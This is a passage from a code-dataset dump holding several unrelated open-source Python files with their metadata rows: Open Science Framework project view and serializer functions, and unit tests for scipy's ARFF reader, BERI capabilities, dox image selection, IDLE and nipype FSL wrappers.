'title': parent.title if parent else '',
'category': parent.category_display if parent else '',
'url': parent.url if parent else '',
'api_url': parent.api_url if parent else '',
'absolute_url': parent.absolute_url if parent else '',
'registrations_url': parent.web_url_for('node_registrations', _guid=True) if parent else '',
'is_public': parent.is_public if parent else '',
'is_contributor_or_group_member': parent.is_contributor_or_group_member(user) if parent else '',
'is_contributor': parent.is_contributor(user) if parent else '',
'can_view': parent.can_view(auth) if parent else False,
},
'user': {
'is_contributor_or_group_member': node.is_contributor_or_group_member(user),
'is_contributor': node.is_contributor(user),
'is_admin': node.has_permission(user, ADMIN),
'is_admin_parent_contributor': parent.is_admin_parent(user, include_group_admin=False) if parent else False,
'is_admin_parent_contributor_or_group_member': parent.is_admin_parent(user) if parent else False,
'can_edit': node.has_permission(user, WRITE),
'can_edit_tags': node.has_permission(user, WRITE),
'has_read_permissions': node.has_permission(user, READ),
'permissions': node.get_permissions(user) if user else [],
'id': user._id if user else None,
'username': user.username if user else None,
'fullname': user.fullname if user else '',
'can_comment': node.can_comment(auth),
'show_wiki_widget': _should_show_wiki_widget(node, user),
'dashboard_id': bookmark_collection_id,
'institutions': get_affiliated_institutions(user) if user else [],
},
# TODO: Namespace with nested dicts
'addons_enabled': [each.short_name for each in addons],
'addons': configs,
'addon_widgets': widgets,
'addon_widget_js': js,
'addon_widget_css': css,
'node_categories': [
{'value': key, 'display_name': value}
for key, value in list(settings.NODE_CATEGORY_MAP.items())
]
}
# Default should be at top of list for UI and for the project overview page the default region
# for a component is that of the it's parent node.
region_list = get_storage_region_list(user, node=node)
data.update({'storage_regions': region_list})
data.update({'storage_flag_is_active': storage_i18n_flag_active()})
if storage_usage_flag_active():
storage_usage = node.storage_usage
if storage_usage:
data['node']['storage_usage'] = sizeof_fmt(storage_usage)
if embed_contributors and not anonymous:
data['node']['contributors'] = utils.serialize_visible_contributors(node)
else:
data['node']['contributors'] = list(node.contributors.values_list('guids___id', flat=True))
if embed_descendants:
descendants, all_readable = _get_readable_descendants(auth=auth, node=node)
data['user']['can_sort'] = all_readable
data['node']['descendants'] = [
serialize_node_summary(node=each, auth=auth, primary=not node.has_node_link_to(each), show_path=False)
for each in descendants
]
if embed_registrations:
data['node']['registrations'] = [
serialize_node_summary(node=each, auth=auth, show_path=False)
for each in node.registrations_all.order_by('-registered_date').exclude(is_deleted=True)
]
if embed_forks:
data['node']['forks'] = [
serialize_node_summary(node=each, auth=auth, show_path=False)
for each in node.forks.exclude(type='osf.registration').exclude(is_deleted=True).order_by('-forked_date')
]
return data
def get_affiliated_institutions(obj):
ret = []
for institution in obj.affiliated_institutions.all():
ret.append({
'name': institution.name,
'logo_path': institution.logo_path,
'logo_path_rounded_corners': institution.logo_path_rounded_corners,
'id': institution._id,
})
return ret
def serialize_collections(cgms, auth):
return [{
'title': cgm.collection.title,
'name': cgm.collection.provider.name,
'url': '/collections/{}/'.format(cgm.collection.provider._id),
'status': cgm.status,
'type': cgm.collected_type,
'issue': cgm.issue,
'volume': cgm.volume,
'program_area': cgm.program_area,
'subjects': list(cgm.subjects.values_list('text', flat=True)),
'is_public': cgm.collection.is_public,
'logo': cgm.collection.provider.get_asset_url('favicon')
} for cgm in cgms if cgm.collection.provider and (cgm.collection.is_public or
(auth.user and auth.user.has_perm('read_collection', cgm.collection)))]
def serialize_preprints(node, user):
return [
{
'title': preprint.title,
'is_moderated': preprint.provider.reviews_workflow,
'is_withdrawn': preprint.date_withdrawn is not None,
'state': preprint.machine_state,
'word': preprint.provider.preprint_word,
'provider': {'name': 'OSF Preprints' if preprint.provider.name == 'Open Science Framework' else preprint.provider.name, 'workflow': preprint.provider.reviews_workflow},
'url': preprint.url,
'absolute_url': preprint.absolute_url
} for preprint in Preprint.objects.can_view(base_queryset=node.preprints, user=user).filter(date_withdrawn__isnull=True)
]
def serialize_children(child_list, nested, indent=0):
"""
Returns the serialized representation of a list of child nodes.
This is a helper function for _get_children and as such it does not
redundantly check permissions.
"""
results = []
for child in child_list:
results.append({
'id': child._id,
'title': child.title,
'is_public': child.is_public,
'parent_id': child.parentnode_id,
'indent': indent
})
if child._id in nested.keys():
results.extend(serialize_children(nested.get(child._id), nested, indent + 1))
return results
def _get_children(node, auth):
"""
Returns the serialized representation of the given node and all of its children
for which the given user has ADMIN permission.
"""
parent_node_sqs = NodeRelation.objects.filter(child=OuterRef('pk'), is_node_link=False).values('parent__guids___id')
children = (Node.objects.get_children(node)
.filter(is_deleted=False)
.annotate(parentnode_id=Subquery(parent_node_sqs[:1])))
admin_children = Node.objects.get_nodes_for_user(auth.user, ADMIN_NODE, children)
nested = defaultdict(list)
for child in admin_children:
nested[child.parentnode_id].append(child)
return serialize_children(nested[node._id], nested)
@must_be_valid_project
@must_have_permission(ADMIN)
def private_link_table(node, **kwargs):
data = {
'node': {
'absolute_url': node.absolute_url,
'private_links': [x.to_json() for x in node.private_links_active],
}
}
return data
@collect_auth
@must_be_valid_project
@must_have_permission(ADMIN)
def get_editable_children(auth, node, **kwargs):
children = _get_children(node, auth)
return {
'node': {'id': node._id, 'title': node.title, 'is_public': node.is_public},
'children': children,
}
@must_be_valid_project
def get_recent_logs(node, **kwargs):
logs = list(reversed(node.logs._to_primary_keys()))[:3]
return {'logs': logs}
def _get_readable_descendants(auth, node, permission=None):
descendants = []
all_readable = True
for child in node.get_nodes(is_deleted=False):
if permission:
perm = permission.lower().strip()
if not child.has_permission(auth.user, perm):
all_readable = False
continue
# User can view child
if child.can_view(auth):
descendants.append(child)
# Child is a node link and user has write permission
elif node.linked_nodes.filter(id=child.id).exists():
if node.has_permission(auth.user, WRITE):
descendants.append(child)
else:
all_readable = False
else:
all_readable = False
for descendant in child.find_readable_descendants(auth):
descendants.append(descendant)
return descendants, all_readable
def serialize_child_tree(child_list, user, nested):
"""
Recursively serializes and returns a list of child nodes.
This is a helper function for node_child_tree and as such it does not
redundantly check permissions.
"""
serialized_children = []
for child in child_list:
if child.has_permission(user, READ) or child.has_permission_on_children(user, READ):
# is_admin further restricted here to mean user is a traditional admin group contributor -
# admin group membership not sufficient
contributors = [{
'id': contributor.user._id,
'is_admin': child.is_admin_contributor(contributor.user),
'is_confirmed': contributor.user.is_confirmed,
'visible': contributor.visible
} for contributor in child.contributor_set.all()]
serialized_children.append({
'node': {
'id': child._id,
'url': child.url,
'title': sanitize.unescape_entities(child.title),
'is_public': child.is_public,
'contributors': contributors,
'is_admin': child.has_permission(user, ADMIN),
'is_supplemental_project': child.has_linked_published_preprints,
},
'user_id': user._id,
'children': serialize_child_tree(nested.get(child._id), user, nested) if child._id in nested.keys() else [],
'nodeType': 'project' if not child.parentnode_id else 'component',
'category': child.category,
'permissions': {
'view': True,
'is_admin': child.has_permission(user, ADMIN)
}
})
return sorted(serialized_children, key=lambda k: len(k['children']), reverse=True)
def node_child_tree(user, node):
""" Returns the serialized representation (for treebeard) of a given node and its children.
:param user: OSFUser object
:param node: parent project Node object
:return: treebeard-formatted data
"""
serialized_nodes = []
assert node, '{} is not a valid Node.'.format(node._id)
parent_node_sqs = NodeRelation.objects.filter(child=OuterRef('pk'), is_node_link=False).values('parent__guids___id')
children = (Node.objects.get_children(node)
.filter(is_deleted=False)
.annotate(parentnode_id=Subquery(parent_node_sqs[:1]))
.include('contributor__user__guids')
)
nested = defaultdict(list)
for child in children:
nested[child.parentnode_id].append(child)
contributors = [{
'id': contributor.user._id,
'is_admin': node.is_admin_contributor(contributor.user),
'is_confirmed': contributor.user.is_confirmed,
'visible': contributor.visible
} for contributor in node.contributor_set.all().include('user__guids')]
can_read = node.has_permission(user, READ)
is_admin = node.has_permission(user, ADMIN)
if can_read or node.has_permission_on_children(user, READ):
serialized_nodes.append({
'node': {
'id': node._id,
'url': node.url if can_read else '',
'title': sanitize.unescape_entities(node.title) if can_read else 'Private Project',
'is_public': node.is_public,
'contributors': contributors,
'is_admin': is_admin,
'is_supplemental_project': node.has_linked_published_preprints,
},
'user_id': user._id,
'children': serialize_child_tree(nested.get(node._id), user, nested) if node._id in nested.keys() else [],
'kind': 'folder' if not node.parent_node or not node.parent_node.has_permission(user, READ) else 'node',
'nodeType': node.project_or_component,
'category': node.category,
'permissions': {
'view': can_read,
'is_admin': is_admin
}
})
return serialized_nodes
@must_be_logged_in
@must_be_valid_project
def get_node_tree(auth, **kwargs):
node = kwargs.get('node') or kwargs['project']
tree = node_child_tree(auth.user, node)
return tree
@must_be_valid_project
@must_have_permission(ADMIN)
def project_generate_private_link_post(auth, node, **kwargs):
""" creata a new private link object and add it to the node and its selected children"""
node_ids = request.json.get('node_ids', [])
name = request.json.get('name', '')
anonymous = request.json.get('anonymous', False)
if node._id not in node_ids:
node_ids.insert(0, node._id)
nodes = [AbstractNode.load(node_id) for node_id in node_ids]
try:
new_link = new_private_link(
name=name, user=auth.user, nodes=nodes, anonymous=anonymous
)
except ValidationError as e:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long=str(e))
)
return new_link
@must_be_valid_project
@must_have_permission(ADMIN)
def project_private_link_edit(auth, **kwargs):
name = request.json.get('value', '')
try:
validate_title(name)
except ValidationError as e:
message = 'Invalid link name.' if e.message == 'Invalid title.' else e.message
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long=message)
)
private_link_id = request.json.get('pk', '')
private_link = PrivateLink.load(private_link_id)
if private_link:
new_name = strip_html(name)
private_link.name = new_name
private_link.save()
return new_name
else:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long='View-only link not found.')
)
def _serialize_node_search(node):
"""Serialize a node for use in pointer search.
:param Node node: Node to serialize
:return: Dictionary of node data
"""
data = {
'id': node._id,
'title': node.title,
'etal': len(node.visible_contributors) > 1,
'isRegistration': node.is_registration
}
if node.is_registration:
data['title'] += ' (registration)'
data['dateRegistered'] = node.registered_date.isoformat()
else:
data['dateCreated'] = node.created.isoformat()
data['dateModified'] = node.modified.isoformat()
first_author = node.visible_contributors[0]
data['firstAuthor'] = first_author.family_name or first_author.given_name or first_author.fullname
return data
@must_be_logged_in
def search_node(auth, **kwargs):
"""
"""
# Get arguments
node = AbstractNode.load(request.json.get('nodeId'))
include_public = request.json.get('includePublic')
size = float(request.json.get('size', '5').strip())
page = request.json.get('page', 0)
query = request.json.get('query', '').strip()
start = (page * size)
if not query:
return {'nodes': []}
# Exclude current node from query if provided
nin = [node.id] + list(node._nodes.values_list('pk', flat=True)) if node else []
can_view_query = Q(_contributors=auth.user)
if include_public:
can_view_query = can_view_query | Q(is_public=True)
nodes = (AbstractNode.objects
.filter(
can_view_query,
title__icontains=query,
is_deleted=False)
.exclude(id__in=nin)
.exclude(type='osf.collection')
.exclude(type='osf.quickfilesnode'))
count = nodes.count()
pages = math.ceil(count / size)
validate_page_num(page, pages)
return {
'nodes': [
_serialize_node_search(each)
for each in nodes[start: start + size]
if each.contributors
],
'total': count,
'pages': pages,
'page': page
}
def _add_pointers(node, pointers, auth):
"""
:param Node node: Node to which pointers will be added
:param list pointers: Nodes to add as pointers
"""
added = False
for pointer in pointers:
if isinstance(node, Collection):
node.collect_object(pointer, auth.user)
else:
node.add_pointer(pointer, auth, save=False)
added = True
if added:
node.save()
@collect_auth
def add_pointer(auth):
"""Add a single pointer to a node using only JSON parameters
"""
to_node_id = request.json.get('toNodeID')
pointer_to_move = request.json.get('pointerID')
if not (to_node_id and pointer_to_move):
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
pointer = AbstractNode.load(pointer_to_move)
to_node = Guid.load(to_node_id).referent
try:
_add_pointers(to_node, [pointer], auth)
except ValueError:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
@must_have_permission(WRITE)
@must_not_be_registration
def add_pointers(auth, node, **kwargs):
"""Add pointers to a node.
"""
node_ids = request.json.get('nodeIds')
if not node_ids:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
nodes = [
AbstractNode.load(node_id)
for node_id in node_ids
]
try:
_add_pointers(node, nodes, auth)
except ValueError:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
return {}
@must_have_permission(WRITE)
@must_not_be_registration
def remove_pointer(auth, node, **kwargs):
"""Remove a pointer from a node, raising a 400 if the pointer is not
in `node.nodes`.
"""
# TODO: since these a delete request, shouldn't use request body. put pointer
# id in the URL instead
pointer_id = request.json.get('pointerId')
if pointer_id is None:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
pointer = AbstractNode.load(pointer_id)
if pointer is None:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
try:
node.rm_pointer(pointer, auth=auth)
except ValueError:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
node.save()
@must_have_permission(WRITE)
@must_not_be_registration
def fork_pointer(auth, node, **kwargs):
"""Fork a pointer. Raises BAD_REQUEST if pointer not provided, not found,
or not present in `nodes`.
:param Auth auth: Consolidated authorization
:param Node node: root from which pointer is child
:return: Fork of node to which nodelink(pointer) points
"""
NodeRelation = apps.get_model('osf.NodeRelation')
linked_node_id = request.json.get('nodeId')
linked_node = AbstractNode.load(linked_node_id)
pointer = NodeRelation.objects.filter(child=linked_node, is_node_link=True, parent=node).first()
if pointer is None:
# TODO: Change this to 404?
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
try:
fork = node.fork_pointer(pointer, auth=auth, save=True)
except ValueError:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
return {
'data': {
'node': serialize_node_summary(node=fork, auth=auth, show_path=False)
}
}, http_status.HTTP_201_CREATED
def abbrev_authors(node):
lead_author = node.visible_contributors[0]
ret = lead_author.family_name or lead_author.given_name or lead_author.fullname
if node.visible_contributors.count() > 1:
ret += ' et al.'
return ret
def serialize_pointer(node, auth):
if node.can_view(auth):
return {
'id': node._id,
'url': node.url,
'title': node.title,
'authorShort': abbrev_authors(node),
}
return {
'url': None,
'title': 'Private Component',
'authorShort': 'Private Author(s)',
}
@must_be_contributor_or_public
def get_pointed(auth, node, **kwargs):
"""View that returns the pointers for a project."""
NodeRelation = apps.get_model('osf.NodeRelation')
return {'pointed': [
serialize_pointer(each.parent, auth)
for each in NodeRelation.objects.filter(child=node, is_node_link=True)
]}
| apache-2.0 | 8,229,932,712,436,812,000 | 35.87617 | 180 | 0.624744 | false |
vberaudi/scipy | scipy/io/arff/tests/test_arffread.py | 27 | 7727 | #!/usr/bin/env python
from __future__ import division, print_function, absolute_import
import datetime
import os
import sys
from os.path import join as pjoin
if sys.version_info[0] >= 3:
from io import StringIO
else:
from cStringIO import StringIO
import numpy as np
from numpy.testing import (TestCase, assert_array_almost_equal, assert_array_equal, assert_equal,
assert_, assert_raises, dec, run_module_suite)
from scipy.io.arff.arffread import loadarff
from scipy.io.arff.arffread import read_header, parse_type, ParseArffError
from scipy._lib._version import NumpyVersion
data_path = pjoin(os.path.dirname(__file__), 'data')
test1 = os.path.join(data_path, 'test1.arff')
test2 = os.path.join(data_path, 'test2.arff')
test3 = os.path.join(data_path, 'test3.arff')
test4 = pjoin(data_path, 'test4.arff')
test5 = pjoin(data_path, 'test5.arff')
test6 = pjoin(data_path, 'test6.arff')
test7 = pjoin(data_path, 'test7.arff')
test8 = pjoin(data_path, 'test8.arff')
expect4_data = [(0.1, 0.2, 0.3, 0.4, 'class1'),
(-0.1, -0.2, -0.3, -0.4, 'class2'),
(1, 2, 3, 4, 'class3')]
expected_types = ['numeric', 'numeric', 'numeric', 'numeric', 'nominal']
missing = pjoin(data_path, 'missing.arff')
expect_missing_raw = np.array([[1, 5], [2, 4], [np.nan, np.nan]])
expect_missing = np.empty(3, [('yop', float), ('yap', float)])
expect_missing['yop'] = expect_missing_raw[:, 0]
expect_missing['yap'] = expect_missing_raw[:, 1]
class DataTest(TestCase):
def test1(self):
# Parsing trivial file with nothing.
self._test(test4)
def test2(self):
# Parsing trivial file with some comments in the data section.
self._test(test5)
def test3(self):
# Parsing trivial file with nominal attribute of 1 character.
self._test(test6)
def _test(self, test_file):
data, meta = loadarff(test_file)
for i in range(len(data)):
for j in range(4):
assert_array_almost_equal(expect4_data[i][j], data[i][j])
assert_equal(meta.types(), expected_types)
def test_filelike(self):
# Test reading from file-like object (StringIO)
f1 = open(test1)
data1, meta1 = loadarff(f1)
f1.close()
f2 = open(test1)
data2, meta2 = loadarff(StringIO(f2.read()))
f2.close()
assert_(data1 == data2)
assert_(repr(meta1) == repr(meta2))
class MissingDataTest(TestCase):
def test_missing(self):
data, meta = loadarff(missing)
for i in ['yop', 'yap']:
assert_array_almost_equal(data[i], expect_missing[i])
class HeaderTest(TestCase):
def test_type_parsing(self):
# Test parsing type of attribute from their value.
ofile = open(test2)
rel, attrs = read_header(ofile)
ofile.close()
expected = ['numeric', 'numeric', 'numeric', 'numeric', 'numeric',
'numeric', 'string', 'string', 'nominal', 'nominal']
for i in range(len(attrs)):
assert_(parse_type(attrs[i][1]) == expected[i])
def test_badtype_parsing(self):
# Test parsing wrong type of attribute from their value.
ofile = open(test3)
rel, attrs = read_header(ofile)
ofile.close()
for name, value in attrs:
assert_raises(ParseArffError, parse_type, value)
def test_fullheader1(self):
# Parsing trivial header with nothing.
ofile = open(test1)
rel, attrs = read_header(ofile)
ofile.close()
# Test relation
assert_(rel == 'test1')
# Test numerical attributes
assert_(len(attrs) == 5)
for i in range(4):
assert_(attrs[i][0] == 'attr%d' % i)
assert_(attrs[i][1] == 'REAL')
# Test nominal attribute
assert_(attrs[4][0] == 'class')
assert_(attrs[4][1] == '{class0, class1, class2, class3}')
def test_dateheader(self):
ofile = open(test7)
rel, attrs = read_header(ofile)
ofile.close()
assert_(rel == 'test7')
assert_(len(attrs) == 5)
assert_(attrs[0][0] == 'attr_year')
assert_(attrs[0][1] == 'DATE yyyy')
assert_(attrs[1][0] == 'attr_month')
assert_(attrs[1][1] == 'DATE yyyy-MM')
assert_(attrs[2][0] == 'attr_date')
assert_(attrs[2][1] == 'DATE yyyy-MM-dd')
assert_(attrs[3][0] == 'attr_datetime_local')
assert_(attrs[3][1] == 'DATE "yyyy-MM-dd HH:mm"')
assert_(attrs[4][0] == 'attr_datetime_missing')
assert_(attrs[4][1] == 'DATE "yyyy-MM-dd HH:mm"')
def test_dateheader_unsupported(self):
ofile = open(test8)
rel, attrs = read_header(ofile)
ofile.close()
assert_(rel == 'test8')
assert_(len(attrs) == 2)
assert_(attrs[0][0] == 'attr_datetime_utc')
assert_(attrs[0][1] == 'DATE "yyyy-MM-dd HH:mm Z"')
assert_(attrs[1][0] == 'attr_datetime_full')
assert_(attrs[1][1] == 'DATE "yy-MM-dd HH:mm:ss z"')
class DateAttributeTest(TestCase):
@dec.skipif(NumpyVersion(np.__version__) < '1.7.0', "No np.datetime64 in Numpy < 1.7.0")
def setUp(self):
self.data, self.meta = loadarff(test7)
@dec.skipif(NumpyVersion(np.__version__) < '1.7.0', "No np.datetime64 in Numpy < 1.7.0")
def test_year_attribute(self):
expected = np.array([
'1999',
'2004',
'1817',
'2100',
'2013',
'1631'
], dtype='datetime64[Y]')
assert_array_equal(self.data["attr_year"], expected)
@dec.skipif(NumpyVersion(np.__version__) < '1.7.0', "No np.datetime64 in Numpy < 1.7.0")
def test_month_attribute(self):
expected = np.array([
'1999-01',
'2004-12',
'1817-04',
'2100-09',
'2013-11',
'1631-10'
], dtype='datetime64[M]')
assert_array_equal(self.data["attr_month"], expected)
@dec.skipif(NumpyVersion(np.__version__) < '1.7.0', "No np.datetime64 in Numpy < 1.7.0")
def test_date_attribute(self):
expected = np.array([
'1999-01-31',
'2004-12-01',
'1817-04-28',
'2100-09-10',
'2013-11-30',
'1631-10-15'
], dtype='datetime64[D]')
assert_array_equal(self.data["attr_date"], expected)
@dec.skipif(NumpyVersion(np.__version__) < '1.7.0', "No np.datetime64 in Numpy < 1.7.0")
def test_datetime_local_attribute(self):
expected = np.array([
datetime.datetime(year=1999, month=1, day=31, hour=0, minute=1),
datetime.datetime(year=2004, month=12, day=1, hour=23, minute=59),
datetime.datetime(year=1817, month=4, day=28, hour=13, minute=0),
datetime.datetime(year=2100, month=9, day=10, hour=12, minute=0),
datetime.datetime(year=2013, month=11, day=30, hour=4, minute=55),
datetime.datetime(year=1631, month=10, day=15, hour=20, minute=4)
], dtype='datetime64[m]')
assert_array_equal(self.data["attr_datetime_local"], expected)
@dec.skipif(NumpyVersion(np.__version__) < '1.7.0', "No np.datetime64 in Numpy < 1.7.0")
def test_datetime_missing(self):
expected = np.array([
'nat',
'2004-12-01T23:59Z',
'nat',
'nat',
'2013-11-30T04:55Z',
'1631-10-15T20:04Z'
], dtype='datetime64[m]')
assert_array_equal(self.data["attr_datetime_missing"], expected)
def test_datetime_timezone(self):
assert_raises(ValueError, loadarff, test8)
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | 5,890,949,724,965,335,000 | 31.195833 | 97 | 0.57215 | false |
8l/beri | cheritest/trunk/tests/cp2/test_cp2_ctoptr_tag.py | 2 | 1520 | #-
# Copyright (c) 2014 Michael Roe
# All rights reserved.
#
# This software was developed by SRI International and the University of
# Cambridge Computer Laboratory under DARPA/AFRL contract FA8750-10-C-0237
# ("CTSRD"), as part of the DARPA CRASH research programme.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase
from nose.plugins.attrib import attr
class test_cp2_ctoptr_tag(BaseBERITestCase):
@attr('capabilities')
def test_cp2_ctoptr_tag_1(self):
'''Check that ctoptr of a capability with the tag bit unset returns 0'''
self.assertRegisterEqual(self.MIPS.a0, 0, "ctoptr of a capability with the tag bit unset did not return 0")
| apache-2.0 | -6,454,877,715,328,081,000 | 41.222222 | 115 | 0.755921 | false |
coolsvap/dox | dox/tests/test_images.py | 1 | 3848 | # -*- coding: utf-8 -*-
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
test_images
--------------
Tests for `dox.images` module.
"""
import fixtures
import testscenarios
from dox import images
from dox.tests import base
def get_fake_image(value):
if value is not None:
def fake_value(self):
return value
else:
def fake_value(self):
return ['ubuntu']
return fake_value
class TestImages(base.TestCase):
scenarios = [
('have_dockerfile', dict(
dockerfile=True, tox_ini=False, dox_yaml=False,
tox_value=[], dox_value=[], images=[])),
('no_dockerfile', dict(
dockerfile=False, tox_ini=False, dox_yaml=False,
tox_value=[], dox_value=[], images=['ubuntu'])),
('tox_no_docker', dict(
dockerfile=False, tox_ini=True, dox_yaml=False,
tox_value=[], dox_value=[], images=['ubuntu'])),
('tox_docker', dict(
dockerfile=False, tox_ini=True, dox_yaml=False,
tox_value=['tox_docker'], dox_value=[], images=['tox_docker'])),
('dox_image', dict(
dockerfile=False, tox_ini=False, dox_yaml=True,
tox_value=[], dox_value=[], images=['ubuntu'])),
('dox_no_image', dict(
dockerfile=False, tox_ini=False, dox_yaml=True,
tox_value=[], dox_value=['dox_value'], images=['dox_value'])),
('both_dox_wins', dict(
dockerfile=False, tox_ini=True, dox_yaml=True,
tox_value=['tox_wins'], dox_value=['dox_wins'],
images=['dox_wins'])),
('both_no_dox', dict(
dockerfile=False, tox_ini=True, dox_yaml=True,
tox_value=['tox_wins'], dox_value=[], images=['ubuntu'])),
('both_dockerfile_passthru', dict(
dockerfile=True, tox_ini=True, dox_yaml=True,
tox_value=[], dox_value=[], images=[])),
('all_dockerfile_dox_override', dict(
dockerfile=True, tox_ini=True, dox_yaml=True,
tox_value=[], dox_value=['dox_wins'], images=['dox_wins'])),
('all_dockerfile_tox_loses', dict(
dockerfile=True, tox_ini=True, dox_yaml=True,
tox_value=['tox_wins'], dox_value=[], images=[])),
]
def setUp(self):
super(TestImages, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'dox.config.dockerfile.Dockerfile.exists',
base.bool_to_fake(self.dockerfile)))
self.useFixture(fixtures.MonkeyPatch(
'dox.config.dox_yaml.DoxYaml.exists',
base.bool_to_fake(self.dox_yaml)))
self.useFixture(fixtures.MonkeyPatch(
'dox.config.tox_ini.ToxIni.exists',
base.bool_to_fake(self.tox_ini)))
self.useFixture(fixtures.MonkeyPatch(
'dox.config.dox_yaml.DoxYaml.get_images',
get_fake_image(self.dox_value)))
self.useFixture(fixtures.MonkeyPatch(
'dox.config.tox_ini.ToxIni.get_images',
get_fake_image(self.tox_value)))
def test_images(self):
image = images.get_images({})
self.assertEqual(image, self.images)
def load_tests(loader, in_tests, pattern):
return testscenarios.load_tests_apply_scenarios(loader, in_tests, pattern)
| apache-2.0 | 1,702,432,181,039,430,700 | 36 | 78 | 0.600572 | false |
Microsoft/PTVS | Python/Product/Miniconda/Miniconda3-x64/Lib/idlelib/idle_test/test_run.py | 3 | 1099 | import unittest
from unittest import mock
from test.support import captured_stderr
import idlelib.run as idlerun
class RunTest(unittest.TestCase):
def test_print_exception_unhashable(self):
class UnhashableException(Exception):
def __eq__(self, other):
return True
ex1 = UnhashableException('ex1')
ex2 = UnhashableException('ex2')
try:
raise ex2 from ex1
except UnhashableException:
try:
raise ex1
except UnhashableException:
with captured_stderr() as output:
with mock.patch.object(idlerun,
'cleanup_traceback') as ct:
ct.side_effect = lambda t, e: t
idlerun.print_exception()
tb = output.getvalue().strip().splitlines()
self.assertEqual(11, len(tb))
self.assertIn('UnhashableException: ex2', tb[3])
self.assertIn('UnhashableException: ex1', tb[10])
if __name__ == '__main__':
unittest.main(verbosity=2)
| apache-2.0 | -1,353,615,728,282,947,300 | 30.4 | 70 | 0.563239 | false |
FCP-INDI/nipype | nipype/interfaces/fsl/tests/test_utils.py | 10 | 10430 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
import os
from tempfile import mkdtemp
from shutil import rmtree
import numpy as np
import nibabel as nb
from nipype.testing import (assert_equal, assert_not_equal,
assert_raises, skipif)
import nipype.interfaces.fsl.utils as fsl
from nipype.interfaces.fsl import no_fsl, Info
from .test_maths import (set_output_type, create_files_in_directory,
clean_directory)
@skipif(no_fsl)
def test_fslroi():
filelist, outdir, cwd, _ = create_files_in_directory()
roi = fsl.ExtractROI()
# make sure command gets called
yield assert_equal, roi.cmd, 'fslroi'
# test raising error with mandatory args absent
yield assert_raises, ValueError, roi.run
# .inputs based parameters setting
roi.inputs.in_file = filelist[0]
roi.inputs.roi_file = 'foo_roi.nii'
roi.inputs.t_min = 10
roi.inputs.t_size = 20
yield assert_equal, roi.cmdline, 'fslroi %s foo_roi.nii 10 20' % filelist[0]
# .run based parameter setting
roi2 = fsl.ExtractROI(in_file=filelist[0],
roi_file='foo2_roi.nii',
t_min=20, t_size=40,
x_min=3, x_size=30,
y_min=40, y_size=10,
z_min=5, z_size=20)
yield assert_equal, roi2.cmdline, \
'fslroi %s foo2_roi.nii 3 30 40 10 5 20 20 40' % filelist[0]
clean_directory(outdir, cwd)
# test arguments for opt_map
# Fslroi class doesn't have a filled opt_map{}
@skipif(no_fsl)
def test_fslmerge():
filelist, outdir, cwd, _ = create_files_in_directory()
merger = fsl.Merge()
# make sure command gets called
yield assert_equal, merger.cmd, 'fslmerge'
# test raising error with mandatory args absent
yield assert_raises, ValueError, merger.run
# .inputs based parameters setting
merger.inputs.in_files = filelist
merger.inputs.merged_file = 'foo_merged.nii'
merger.inputs.dimension = 't'
merger.inputs.output_type = 'NIFTI'
yield assert_equal, merger.cmdline, 'fslmerge -t foo_merged.nii %s' % ' '.join(filelist)
# verify that providing a tr value updates the dimension to tr
merger.inputs.tr = 2.25
yield assert_equal, merger.cmdline, 'fslmerge -tr foo_merged.nii %s %.2f' % (' '.join(filelist), 2.25)
# .run based parameter setting
merger2 = fsl.Merge(in_files=filelist,
merged_file='foo_merged.nii',
dimension='t',
output_type='NIFTI',
tr=2.25)
yield assert_equal, merger2.cmdline, \
'fslmerge -tr foo_merged.nii %s %.2f' % (' '.join(filelist), 2.25)
clean_directory(outdir, cwd)
# test arguments for opt_map
# Fslmerge class doesn't have a filled opt_map{}
# test fslmath
@skipif(no_fsl)
def test_fslmaths():
filelist, outdir, cwd, _ = create_files_in_directory()
math = fsl.ImageMaths()
# make sure command gets called
yield assert_equal, math.cmd, 'fslmaths'
# test raising error with mandatory args absent
yield assert_raises, ValueError, math.run
# .inputs based parameters setting
math.inputs.in_file = filelist[0]
math.inputs.op_string = '-add 2.5 -mul input_volume2'
math.inputs.out_file = 'foo_math.nii'
yield assert_equal, math.cmdline, \
'fslmaths %s -add 2.5 -mul input_volume2 foo_math.nii' % filelist[0]
# .run based parameter setting
math2 = fsl.ImageMaths(in_file=filelist[0], op_string='-add 2.5',
out_file='foo2_math.nii')
yield assert_equal, math2.cmdline, 'fslmaths %s -add 2.5 foo2_math.nii' % filelist[0]
# test arguments for opt_map
# Fslmath class doesn't have opt_map{}
clean_directory(outdir, cwd)
# test overlay
@skipif(no_fsl)
def test_overlay():
